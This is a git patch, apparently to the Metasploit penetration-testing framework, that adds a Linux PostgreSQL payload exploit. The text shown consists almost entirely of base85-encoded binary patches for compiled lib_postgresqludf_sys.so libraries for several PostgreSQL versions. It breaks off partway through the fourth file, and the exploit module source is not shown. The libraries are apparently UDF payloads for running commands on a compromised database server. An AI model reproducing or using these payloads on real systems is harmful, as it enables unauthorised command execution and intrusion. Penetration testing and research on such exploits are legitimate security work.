From ad2b457fdae035ec0d45e7d4c1fb4bc96478aeed Mon Sep 17 00:00:00 2001
From: midnitesnake <midnitesnake@gmail.com>
Date: Tue, 14 Aug 2012 17:46:35 +0100
Subject: [PATCH] Added linux port for postgres payload

---
 .../postgres/8.2/32/lib_postgresqludf_sys.so  | Bin 0 -> 5124 bytes
 .../postgres/8.2/64/lib_postgresqludf_sys.so  | Bin 0 -> 7704 bytes
 .../postgres/8.3/32/lib_postgresqludf_sys.so  | Bin 0 -> 5124 bytes
 .../postgres/8.3/64/lib_postgresqludf_sys.so  | Bin 0 -> 7704 bytes
 .../postgres/8.4/32/lib_postgresqludf_sys.so  | Bin 0 -> 5132 bytes
 .../postgres/8.4/64/lib_postgresqludf_sys.so  | Bin 0 -> 7712 bytes
 lib/msf/core/exploit/postgres.rb              | 106 ++++++++++-
 .../linux/postgres/postgres_payload.rb        | 170 ++++++++++++++++++
 8 files changed, 271 insertions(+), 5 deletions(-)
 create mode 100755 data/exploits/postgres/8.2/32/lib_postgresqludf_sys.so
 create mode 100755 data/exploits/postgres/8.2/64/lib_postgresqludf_sys.so
 create mode 100755 data/exploits/postgres/8.3/32/lib_postgresqludf_sys.so
 create mode 100755 data/exploits/postgres/8.3/64/lib_postgresqludf_sys.so
 create mode 100755 data/exploits/postgres/8.4/32/lib_postgresqludf_sys.so
 create mode 100755 data/exploits/postgres/8.4/64/lib_postgresqludf_sys.so
 create mode 100644 modules/exploits/linux/postgres/postgres_payload.rb

diff --git a/data/exploits/postgres/8.2/32/lib_postgresqludf_sys.so b/data/exploits/postgres/8.2/32/lib_postgresqludf_sys.so
new file mode 100755
index 0000000000000000000000000000000000000000..ce33ad34e69a06d9b62e6caf53da33135c5f5a44
GIT binary patch
literal 5124
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

literal 0
HcmV?d00001

diff --git a/data/exploits/postgres/8.2/64/lib_postgresqludf_sys.so b/data/exploits/postgres/8.2/64/lib_postgresqludf_sys.so
new file mode 100755
index 0000000000000000000000000000000000000000..02e7e09bac796e627bbf907b9287a936b224c919
GIT binary patch
literal 7704
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
F|8J&iJ_P^(

literal 0
HcmV?d00001

diff --git a/data/exploits/postgres/8.3/32/lib_postgresqludf_sys.so b/data/exploits/postgres/8.3/32/lib_postgresqludf_sys.so
new file mode 100755
index 0000000000000000000000000000000000000000..eb20b094ea800ff0b7fdcc3d4180b3cd722154ba
GIT binary patch
literal 5124
zcmc&&e{56N6~0akWDvk)bOgvC(6po4W|2T!SkV?p0xN?l5D3sLyc*{@w(DQm&y+A=
zAeW7YWsQ~o(P?a=0(GbYgjzZQt5}#L2db<Kg-wwrRcMITH0c(8Y_O5>_I>ZYn;F_N
zY5(j*$LE}TzI*Py=bd}+d-*}bvc(RELr5wX#e&x55+UY7R=6zBTu~{UVwRXJ%1yt-
zQ+AEDcmxgL+23sYG9<VJ4KDCV+g}9PhdzDqk$Yj2>34!xT-DkjK1I_17(8DAmx3`(
zF$2tgkAg|XmJsHAppOPW4t~UL{~{!YH)%Y6r-El%reJK+1n?wq6?htW6!=SE(nRnS
za2X9y1-O#RL#P}+uG`GPLvV$zaWIe`lkCS}TS819)~tNf90UGBL3^P(83yyhH8EFQ
z59yWj<A1ulRAf5qEg#p)Ji6OgO*`yAQ}%{(rtI{Um$xoz_`^WW`c>1E<yU4bJv#H}
zHLu-j>D#!rqRKzD=2YhTxSE&!_ddS(*KxVAuU~3^`r;>yT}adL{7D%w^LCmB=zCz=
zZ_)sLgvrsawef7@+6zoG*I%W>rb@^v8?YToX8-xNy$w3;-+)OuFzv6|{*92d7uxn+
z+dsm#$Jzb~wmsF3ZvaQC0keNM4NweBdyI|0VE4a5CrG#Lqn0TS+wsb6yxaD(rbvu4
z6SBtk^Vu-|ey}9wXF2$FJbc!A87iR}vJV@i$+rEFqhY^i+g`-G#D@)XiR(rq?4AN!
zLHqH7ct3{yX9S-G9OG|<eY(K^G3+<sp9e|*ng`--LHm2a@3H-y^A2uaP#LQB_mFGR
zf2C=UG54B(EWPxXif=*gFBtEKu)7Lup(yR)Xhcb9p17tcLJ33ynoxWYaCtX-sCq(y
zEvitKZc<jN?SX`*#_K|!L_$r7#&#v_X%Bc6Uozqqv38<;Q6<rlP}I%pgDsmpq5Cl#
z0ul97jlMugjjNtELfcd=>Pcuyn@3BAg)bU^K_Ip_8u5v6*b@^8Egtd4I>d{ffEEk1
z39mn{#I(4gMHNlmtWg(XPbd`i3Te~l^?OVlBF5B+@Fi6B1>w`wP)PW^p=d%CK5GW1
z8>$(>*RE;_5wif8hNgx^3_w+c0vo*UMAZG1P*hCSgVb$EB&?*ODbgmEEPHlQol@hj
zcF!5sXAf)Dcq&CWXL!<(sL8(~+hf^I^E7l|Uq9@R`@UE#MlG>kNQvnIJawn=+ik8u
z098^fG~1qF+C^eJY|<})W|<wf<(syA$Cf!;euCN~ZUPQb%4OIql;^M~C_ezM2p7Oz
z;3%iUPnoynNAzQ3-lfFyrxJ&~T}_F$y~IH-r;SUegA$j_yS98D<I+B0%WC3b*V=M4
z+o$7frVV++mQ&b{i(&yK+E&@Jo)SrmQzAn@v87Il3-AL<9440-2Qp6^JZQ^**m5NL
zvVA3S$m#bfad{l1#N6Me#Kk&9i9}5y9%uMr<ZUD_;3Jf{^o~>F;_QSRh4wB=*sJxc
zO{oEA9w`<rJF~Np()7MthGFb_UmKAJNaRoP=Ox5k+j2f@yah!V2l-4$1}7r?RIgn|
zH{&2H#ZULOUYLmA+>}2Gb7%Hl%riCM+VN{%#v<98P7QIOPHkK|#XDVhR^{J8OFGTd
zH<PM>p4nH9-zR#{-YLq&jQQ6Sm6>0$cV?kOPZ4Ikk|M(DGyi)0!(58t9jPu?%lg(V
z*OzyrVQ2O`=J3w+zDnS+yhqae?pWHGOp0w7-*`XO<!ouqrYowldsm-4f^6zn5#{9J
zVeQbcc3@cBFE#z@nr7s)Jl#-Y#9Vo<Pw!5bn+j%>x+AtOPOeA|lm@4nZD;$7GKry<
zbwTm%pa{;$Oq_kYH#llWZ(~r{eJWFT3_Yv4Ry1dpI2)VHR^wuS`AKfDjC!kOz0#Up
z8FU0iqv@;e#5nyQV%^qEhN}ORI&bXmOD9Y8+c%Esw{Kraoh@ErML%!ozunzuwPs2)
ze3bfVz;7JOY;o$nw=X<<^N<|lKM@fsJuQ`Ua`JUUdc$C*?qAm6>E(lZ_sv7O`tqUS
zxygR>hR*y5X+mZ)+pfsuoWd3pHxKd2Ggr^8^S=a4qu$VKO|Z+gt5eS=$E8=7RCneU
zl{&8d4jtA6i{x_k3ae+Ts}u<oO?pF**)!eHQ!Aq)A&AnQoQS+z3B)9FwWW^g&i?I9
zL5Gp-v8FGBrC0Z4>dPFme>IB2rRVx9_c$kY=AGlubndAiab>r&dHfmYq}1i{rd8kU
zSo93~Im@>8VVs<Eq-Zv0qR*|;vzE5Nn(KNaX)RChL*UQIZ$a_ciRpG$@wHI~YRIF3
z1z^U-JC&YW`<(w(q|RDjcf%l@LT?!8e=@x-kD54dq+17X9BXX6eIe6fIPNxClSA6p
z7|DEk^`M^1I9+xcS_jc?BnN^{_{<^96edq#VQ7{uJH9Ejl61phu70E;^kj*>l52dD
z@~Pjy6J$p9?66i*rRU6mcqSO-nawV(6vM2MgCM9rXcqZi65`@KX~hsbvs+L+>68nj
zVUK8&GjCDNoOql|PyNMd^rlC`k;E3U&Vhn+t`=SM&)+qSbvV=F8^rADnmKcyeCp|W
z^A|3vt8Z8=;)uZn7c$SNM{&2bK~{om!6b}o6iVvs$9t1oY6nh3JQ~6GDW0Auz<;}E
zL<ivKH_|yY;)oV&abMv`7rW7pBj3DpF`PJoV;C;e<{Y?Z_#F{LT<Vw6neU`~(U0F&
zJbZDEn{>}Gq6gr|6r*s9LC8kf|AfSK_&*W9871W~*dM{Xr^S-Gx^Gm@s#iAzJdw(|
z?m6z7uUEUPpRm;buiKsQ;~h`)Y`~XQB<c2h5`N)s>xd*e!j{Afp6S`7#uI^P<UT`z
zFRq4&x0F~&6K?Yj*Ui^K;WpoM-SMdT(&kqEiZAX7tHSNoqVWU<utd;{KnUUq2fP>{
zijMeko6)SEc-up#XgI7!G@0W6D)|k~I%18mw#f7Fuvt4K)*P8N^>;jX;#hm+5cCIe
z{7xs9IMyUN24)P_5G8MUmI3<`#~LQHb|p#mF*LCLh-2-MzYATC%XV@NnDt7XHA}9A
zUN|mHu@KDKC62XEX6?&(#B&cU1xp<F3YqgJj{8jF_>IQ7B8<6LxnE~PmqZ+ibC$T{
zz>pur5xcGccNrM+ZW#nV&Vi(WWjvk@Wcl4mzwDygIIfr1BY6P<Hc4C<HscZ32@F~K
z2$lMa(1~Ln`2V3U;4sBulDO??k+>e<dOioYs{nTixJ#ci?jGQnV~%V7?+LhG=yE(t
z&SM`~j?4Gh!+5{uIVy=b@~dEp;~9AZIG&G^B<?jdNF2|pbHLFjN$S5u1IOq5_$}T8
f+-K$G2>gsEiMXFh15*0rn9|jbjrz7U3UL1hvEYQL

literal 0
HcmV?d00001

diff --git a/data/exploits/postgres/8.3/64/lib_postgresqludf_sys.so b/data/exploits/postgres/8.3/64/lib_postgresqludf_sys.so
new file mode 100755
index 0000000000000000000000000000000000000000..5dd842a4b5b2458070aa4681bfaadaf8dfc48c8f
GIT binary patch
literal 7704
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
